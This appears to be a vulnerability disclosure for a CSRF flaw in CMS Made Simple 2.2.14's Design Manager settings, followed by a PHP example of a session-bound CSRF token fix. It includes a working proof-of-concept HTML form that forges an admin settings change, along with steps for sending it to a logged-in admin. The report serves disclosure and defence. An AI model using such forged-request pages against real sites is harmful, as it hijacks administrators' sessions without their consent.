Summary:
CSRF on Settings - Design Manager
Detailed Description:
Hello,
I discovered a CSRF vulnerability in Settings - Design Manager.
Steps to reproduce:
1) Capture the request that changes the locking settings.
2) Extract all the parameters from that request and build an HTML page that resubmits them, for example:
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://cms.pick/cmsms-2.2.14-install/admin/moduleinterface.php"
          method="POST" enctype="multipart/form-data">
      <input type="hidden" name="mact" value="DesignManager,m1_,admin_settings,0" />
      <input type="hidden" name="__c" value="543fbd2ceebe218581e" />
      <input type="hidden" name="m1_submit" value="Submit" />
      <input type="hidden" name="m1_lock_timeout" value="90" />
      <input type="hidden" name="m1_lock_refresh" value="120" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
3) Change the values of m1_lock_timeout and m1_lock_refresh in the page as desired.
4) Send the page to a logged-in admin; when they click "Submit request", the form is posted to the admin interface.
5) The lock timeout settings are changed for the admin.
This vulnerability affects the latest version of CMS Made Simple (2.2.14) and
below. The vulnerability can be mitigated by using CSRF tokens that are bound to the admin's session and verified on the settings request.
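As an added illustration of the suggested mitigation (example code, not CMS Made Simple's own), a session-bound token that the settings handler verifies before applying changes. The field names m1_lock_timeout and m1_lock_refresh come from the captured request above; save_lock_settings is a hypothetical persistence helper.

```php
<?php
// Illustrative CSRF protection for an admin settings handler (not CMSMS code).
// Assumes a PHP session has already been started for the authenticated admin.

// Return the session-bound token, creating it once per session.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field that the legitimate settings form must include. A third-party
// page cannot read this value because of the same-origin policy, so a forged
// form like the one above cannot supply it.
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

// Validate the submitted token; constant-time compare to avoid timing leaks.
function csrf_valid(array $post): bool {
    if (empty($_SESSION['csrf_token']) || !isset($post['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

// Settings handler: refuse the request unless the token matches the session,
// then validate the lock values before persisting them.
function handle_lock_settings(array $post): bool {
    if (!csrf_valid($post)) {
        http_response_code(403);
        return false;
    }
    $opts    = ['options' => ['min_range' => 1]];
    $timeout = filter_var($post['m1_lock_timeout'] ?? '', FILTER_VALIDATE_INT, $opts);
    $refresh = filter_var($post['m1_lock_refresh'] ?? '', FILTER_VALIDATE_INT, $opts);
    if ($timeout === false || $refresh === false) {
        http_response_code(400);
        return false;
    }
    save_lock_settings($timeout, $refresh); // hypothetical persistence helper
    return true;
}
```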